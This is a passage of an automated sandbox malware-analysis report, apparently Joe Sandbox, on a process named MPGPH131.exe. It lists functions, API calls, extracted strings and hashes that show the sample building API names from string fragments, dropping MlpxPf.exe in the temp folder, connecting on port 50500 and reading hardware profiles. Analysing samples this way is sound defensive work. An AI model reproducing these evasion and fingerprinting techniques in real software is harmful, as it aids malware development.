Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
Instruction ID: bf65cef557152a844086f357d429c37ed0becb8e2df247227c6f83ebe9463675
Opcode Fuzzy Hash: ee13bcdeeac3d293a727f89d084407975a48309561f834178367d3d510bed3e3
Instruction Fuzzy Hash: B141E2B1900608ABC714DF59C845BAAF7F8FF85720F14861AF954E7681E774AA408BE1

Function 008A45C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 008A4E29
___std_exception_destroy.LIBVCRUNTIME ref: 008A4E42
___std_exception_destroy.LIBVCRUNTIME ref: 008A594D
___std_exception_destroy.LIBVCRUNTIME ref: 008A5966

Strings

value, xrefs: 008A5873

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
Instruction ID: fea0bcf48620ad224774cd9c87744dc637ea19baed147d106c0b7e148078be55
Opcode Fuzzy Hash: ffedefc0a964181ccb1d98b4377fcdf068f25662779c19c377b641d801048940
Instruction Fuzzy Hash: EE51E2B0C00648DFEF14DFA4DC85BDEBBB4FF46304F184259E455AB682D7746A888B52

Function 008A99A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 008A99F1

Strings

type must be string, but is , xrefs: 008A9A58
type must be boolean, but is , xrefs: 008A9AE2

Memory Dump Source

Source File: 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.3915530109.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3916521795.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3920455320.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3921592107.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3924029491.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3925970095.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926016347.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926095737.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.3926209850.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
Instruction ID: ebc93930da12e310e6cf2037c2ed1998ad3f802404b526dc2d2ad3eeb81ad4e8
Opcode Fuzzy Hash: 85336d12a36526499f48fb2b31c4dc688bfb4f36d62f0316d3282c46069c449c
Instruction Fuzzy Hash: FA316CB5904248EFDB14EBA8D842B9EB7A8FB44710F144669F415D7AC2EB34AA04C792

Analysis Process: MPGPH131.exePID: 1304, Parent PID: 660COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	1.9%
Signature Coverage:	0%
Total number of Nodes:	207
Total number of Limit Nodes:	33

Executed Functions

Function 00E07044 Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 171
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNELBASE(00000104,?), ref: 00E071FA
CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00E07223

Strings

WinE, xrefs: 00E07110
athA, xrefs: 00E07199
catA, xrefs: 00E071AF
odul, xrefs: 00E0722D
GetT, xrefs: 00E07188
GetM, xrefs: 00E070B6
.dll, xrefs: 00E07102
lstr, xrefs: 00E071A7
Kern, xrefs: 00E070F4
MlpxPf.exe, xrefs: 00E071FD, 00E07200
dleA, xrefs: 00E070D0
Clos, xrefs: 00E07129
el32, xrefs: 00E070FB
Crea, xrefs: 00E07169
Writ, xrefs: 00E07148

Memory Dump Source

Source File: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: CreateFilePathTemp
String ID: .dll$Clos$Crea$GetM$GetT$Kern$MlpxPf.exe$WinE$Writ$athA$catA$dleA$el32$lstr$odul
API String ID: 1031868398-650681566
Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction ID: 42c59f00e1eedd9f801db889e395201809067f4dbc25380a7ce7abbf80ff645a
Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
Instruction Fuzzy Hash: 63610D74D0A215DBCF24CF94C844AADB7B0BF48319F25A5AAD5857B2C1C370AEC1CB91

Function 0084DB60 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 99
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32 ref: 0084DB8B
socket.WS2_32(?,?,?,?,?,?,50500,?,?), ref: 0084DC2E
connect.WS2_32(00000000,?,?,?,?,?,50500,?,?), ref: 0084DC42
closesocket.WS2_32(00000000), ref: 0084DC4D

Strings

`4u, xrefs: 0084DC1E
50500, xrefs: 0084DBE8

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Startupclosesocketconnectsocket
String ID: 50500$`4u
API String ID: 3098855095-1883443620
Opcode ID: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
Instruction ID: 18081c6f53999451cd6635194afa742b9527dee88daed567605308f670ef726a
Opcode Fuzzy Hash: 2dd402dd94c68f3afb362514ba8549ffd176e0b1d253c8c63ddf144f3637cb14
Instruction Fuzzy Hash: 8E31A1726047496BC7209B288C84A3BB7E5FF89734F001F19F9A8932E0E37199158692

Function 054C0B92 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Strings

kGPR, xrefs: 054C0BA0

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID: kGPR
API String ID: 2104809126-2271762903
Opcode ID: 1eaa9fd1738cd3364c24f112b5a1c5075cfd401e22f7f258aba97046ea9896bf
Instruction ID: a552080b15766a435ff12739834fea2b7ebbd992064b08edd58d04f383e17290
Opcode Fuzzy Hash: 1eaa9fd1738cd3364c24f112b5a1c5075cfd401e22f7f258aba97046ea9896bf
Instruction Fuzzy Hash: FD2165EF60C221BDB555C0812B68AFF5BBED5D173073184ABF407C2146E2994E4F5071

Function 00922F0C Relevance: 1.7, APIs: 1, Instructions: 198
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNELBASE(?,00000000,00916AF7,?,00000000,00000000,00000000,?,00000000,?,0090C023,00916AF7,00000000,0090C023,?,?), ref: 00923091

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 18559e2b6b0dd1c8b30067557f1f5257e1aa896f0807445a4f3b956ee0a329da
Instruction ID: f4171a5361d03dbe5752c6877bdeea6ac4cb9033177d5b0c5e6bb6b28e89f8ff
Opcode Fuzzy Hash: 18559e2b6b0dd1c8b30067557f1f5257e1aa896f0807445a4f3b956ee0a329da
Instruction Fuzzy Hash: A361E471D04129BFDF11DFA8E984AFEBBB9AF49304F144145E900AB25AC379DE11DBA0

Function 054C0B15 Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 93faca00bfd1b99d18f9e21b7ed4f464ddd256a06ae82c555aee13e6a0c855cf
Instruction ID: 2fe48806741bf6b099f1b7c27def11d1324a98b14682484211b9e3bc980e2166
Opcode Fuzzy Hash: 93faca00bfd1b99d18f9e21b7ed4f464ddd256a06ae82c555aee13e6a0c855cf
Instruction Fuzzy Hash: EA2164FB64D221FDB595C5812B5CAFF6ABEE6D273473184AFF40BC2102E2954D8A5031

Function 054C0B26 Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: bc3131076226f7ead9805434ca655c9b764edaa92e2be822d564d790bdf94976
Instruction ID: 35b8b561c51122753df234da23ef16dae6e64753d695c43b892b842c0a91265a
Opcode Fuzzy Hash: bc3131076226f7ead9805434ca655c9b764edaa92e2be822d564d790bdf94976
Instruction Fuzzy Hash: 0A2184FB60C221FDB195C5812B58AFF6BBEEAD273473184AFF40BC2102E2954D8A5031

Function 054C0B44 Relevance: 1.6, APIs: 1, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 81616d595d1d824d05c3e29c517c178a9ac512cb554a66ebdea9a290796c2451
Instruction ID: 92b9ccbf5445fe5c8fe9b5ffbb70410d39eff8200e56475abb75c93429a30a98
Opcode Fuzzy Hash: 81616d595d1d824d05c3e29c517c178a9ac512cb554a66ebdea9a290796c2451
Instruction Fuzzy Hash: 5721A5FB60C225FDB295C1812B58AFF6BBEE6C177473184AFF807C2546E2984E4A5031

Function 0089BA20 Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0089BB71

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000B07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000BF3000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C2F000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C36000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.0000000000C46000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3921901778.0000000000C47000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923821539.0000000000E03000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923859061.0000000000E04000.00000080.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923900415.0000000000E07000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3923942817.0000000000E08000.00000080.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_830000_MPGPH131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction ID: 8e33831dd2dc053828fe30de0cc3f36ae52405c48670f1ee53602caf4269c2db
Opcode Fuzzy Hash: b19d2212db506fa46971754378483badd225f06599945ea51feb898bce11e8e1
Instruction Fuzzy Hash: CE41E2729011199FCF15EF68EE816AEB7A5FF84350F280669F815EB285D730DE1087D1

Function 054C0BAB Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 724bf6ed6eb177772d9fcc85ba76a7c13b8c0074fce0ddd4eb41aa0b1561103d
Instruction ID: 491c3cb3629a7b67e7cc5d9e1d8fe87f997b68a699965bb1a2ece09aeda21188
Opcode Fuzzy Hash: 724bf6ed6eb177772d9fcc85ba76a7c13b8c0074fce0ddd4eb41aa0b1561103d
Instruction Fuzzy Hash: 1B2150EB20C224BDB595C0812F68AFF5BBED6D173073184ABF407C2546E2994E4E5031

Function 054C0BBE Relevance: 1.6, APIs: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: d107369657e980949a25e718c7e5bef74f99d2483872c304b2fa336b9853a1ad
Instruction ID: c07149523d90b8ce57df76cb494f90587398d6e176d7def6ca820d4478010951
Opcode Fuzzy Hash: d107369657e980949a25e718c7e5bef74f99d2483872c304b2fa336b9853a1ad
Instruction Fuzzy Hash: 9A1151FB60C224BDB595C0822B68AFF57BED6D173073184ABF407C2546E2994E8E5031

Function 054C0BDA Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 667b9625a125e96cd79181428210735cad02993c6a1ec12e5bbddc947865a0f2
Instruction ID: f96b6df7973fd7c69da4f8488fa8b9cc1a04b2883c3d046dbe0dc40b346b1c11
Opcode Fuzzy Hash: 667b9625a125e96cd79181428210735cad02993c6a1ec12e5bbddc947865a0f2
Instruction Fuzzy Hash: 201130FB60C224AD7595C1422B68AFB6ABED5D177033188ABF80BC6546E2944D8A5031

Function 054C0BF0 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 5006ca93c50f89d2cf0e98c1d522621c3ec2994611516626936f8eb2e57af57b
Instruction ID: 22b155024e49eb4fac010b8b46a77474d6841c472fddad03fe01fe6930984fa5
Opcode Fuzzy Hash: 5006ca93c50f89d2cf0e98c1d522621c3ec2994611516626936f8eb2e57af57b
Instruction Fuzzy Hash: 5711BFEB20C124BD7296C1422B58EFB2ABED5C273033588ABF807C6546E2954D8A5131

Function 054C0C20 Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 0f9051a49622b09c72cc7008328b23dcd4c084cccacd6f9f0255e8dac1924765
Instruction ID: b2d638bb5e680168ef726a368d2815321132111174fa67e6018ba3e289462673
Opcode Fuzzy Hash: 0f9051a49622b09c72cc7008328b23dcd4c084cccacd6f9f0255e8dac1924765
Instruction Fuzzy Hash: 3A1130EF60C164BDB595C0422B68AFF5ABED6D6730731C8ABF807C2546E2954E8E5031

Function 054C0C3A Relevance: 1.6, APIs: 1, Instructions: 85
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: 67a6e63b860795a626df1d1de49887b80c064e05856225a428b138b4f1985a37
Instruction ID: 6b4b79dcb424b20c6a76c627e025f796b4f3b59ac3ac51356f8e9d448793783e
Opcode Fuzzy Hash: 67a6e63b860795a626df1d1de49887b80c064e05856225a428b138b4f1985a37
Instruction Fuzzy Hash: 330121EB60C2607D7596C0822F64EFB67BED5D2B70331C86BF807C2546E2954E8E5071

Function 054C0C45 Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: e3289ecbed88a1cd3aa42db1d01c25087ea825ca7b42fa56229819c54cef3112
Instruction ID: b0d94bb2204a744b06ced37c7cb109ff51d65cca9cd620f8e5ce31d3e22af372
Opcode Fuzzy Hash: e3289ecbed88a1cd3aa42db1d01c25087ea825ca7b42fa56229819c54cef3112
Instruction Fuzzy Hash: A9012CEB60C2607D7592C1862B24EFB57BED9D2B30331C86BF806C2546E2994E8E6071

Function 054C0C52 Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 054C0C7D

Memory Dump Source

Source File: 0000000B.00000002.3930728839.00000000054C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_54c0000_MPGPH131.jbxd

Similarity

API ID: CurrentProfile
String ID:
API String ID: 2104809126-0
Opcode ID: ec85f34a5538fab9995556ebae7729c2315bafa810b6921f9634788e342419ef
Instruction ID: 6bff85e86e9c50eb07c6e85432e52505ef646735e77159d904100c66a2933450
Opcode Fuzzy Hash: ec85f34a5538fab9995556ebae7729c2315bafa810b6921f9634788e342419ef
Instruction Fuzzy Hash: A60171FB60C2606EB246C5422B64AFB67BDD9D2730331C87BF407C3546E2A54E8E9135

Function 00922582 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00922469,00000000,CF830579,00961148,0000000C,00922525,0091662D,?), ref: 009225D8

Memory Dump Source

Source File: 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, Offset: 00830000, based on PE: true

Associated: 0000000B.00000002.3909394103.0000000000830000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3909502764.0000000000963000.00000040.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913539961.0000000000967000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.3913587401.000000000097A000.00000040.00000001.01000000.00000009.sdmpDownload File
